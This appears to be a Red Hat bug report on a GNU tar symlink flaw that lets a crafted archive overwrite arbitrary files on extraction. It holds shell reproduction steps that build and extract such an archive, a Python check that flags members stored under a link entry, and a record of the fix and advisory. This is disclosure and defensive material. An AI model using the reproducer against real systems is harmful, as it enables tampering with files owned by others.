Description of problem:
GNU tar contains a flaw that makes tar overwrite an arbitrary file when extracting a crafted archive. See the original advisory for details.

Steps to Reproduce:
#TAR=/usr/src/redhat/BUILD/tar-1.13.25/src/tar
TAR=tar
# crafting a symlink
gcc -o tarxyz tarxyz.c
./tarxyz > xyz.tar
# cleaning environment up
rm -f /home/$USER/hello.txt
rm -f xyz
# adding files, relative to xyz/
mkdir -p xyz/home/$USER
echo "Hello" > xyz/home/$USER/hello.txt
tar -rf xyz.tar xyz/home/$USER
# exploitation
rm -rf xyz # so symlink to / can be created
$TAR -xf xyz.tar
cat /home/$USER/hello.txt

Additional info:
All supported RHEL (2.1--4) and FC (5,6) releases are vulnerable
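
A pre-extraction check for the archive layout used in the steps above, added here as an example (it is not part of the original report or of tar): it flags members stored beneath a path that the same archive declares as a link. It assumes the crafted entry appears as an ordinary symlink member; `find_link_traversal`, `build_sample_archive` and the sample member names are constructed for illustration.

```python
import io
import posixpath
import tarfile


def build_sample_archive(with_link: bool = True) -> bytes:
    """Constructed sample: optional link member 'xyz' -> '/', then a file under xyz/."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.GNU_FORMAT) as tar:
        if with_link:
            link = tarfile.TarInfo("xyz")
            link.type = tarfile.SYMTYPE
            link.linkname = "/"
            tar.addfile(link)
        data = b"Hello\n"
        member = tarfile.TarInfo("xyz/home/user/hello.txt")
        member.size = len(data)
        tar.addfile(member, io.BytesIO(data))
    return buf.getvalue()


def find_link_traversal(archive: bytes) -> list:
    """Return (member, link, target) for every member whose path passes through
    a link entry that appeared earlier in the same archive."""
    links = {}      # normalized link path -> link target
    findings = []
    # mode "r:" reads headers only; nothing is written to disk.
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tar:
        for info in tar:
            name = posixpath.normpath(info.name)
            # Check every parent directory of the member against known links.
            parent = posixpath.dirname(name)
            while parent not in ("", "/", "."):
                if parent in links:
                    findings.append((info.name, parent, links[parent]))
                    break
                parent = posixpath.dirname(parent)
            if info.issym() or info.islnk():
                links[name] = info.linkname
    return findings


if __name__ == "__main__":
    for member, link, target in find_link_traversal(build_sample_archive()):
        print(f"{member}: extracted through link {link} -> {target}")
```

An archive that produces any finding should be rejected or unpacked only into a throwaway directory, since the listed members would be written wherever the link points.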
Kees Cook (of Ubuntu) reported an issue to upstream and proposed a patch. See this thread: http://lists.gnu.org/archive/html/bug-tar/2006-11/msg00028.html
Ping on this issue. Can we get some updated packages? The patch looks to be rather simple.
fixed in: tar-1.14-12.RHEL4, tar-1.13.25-15.RHEL3, tar-1.13.25-6.AS21.1
I dunno how to file RHSA-2006:0749, concretely built for AS21.1.
An advisory has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you. http://rhn.redhat.com/errata/RHSA-2006-0749.html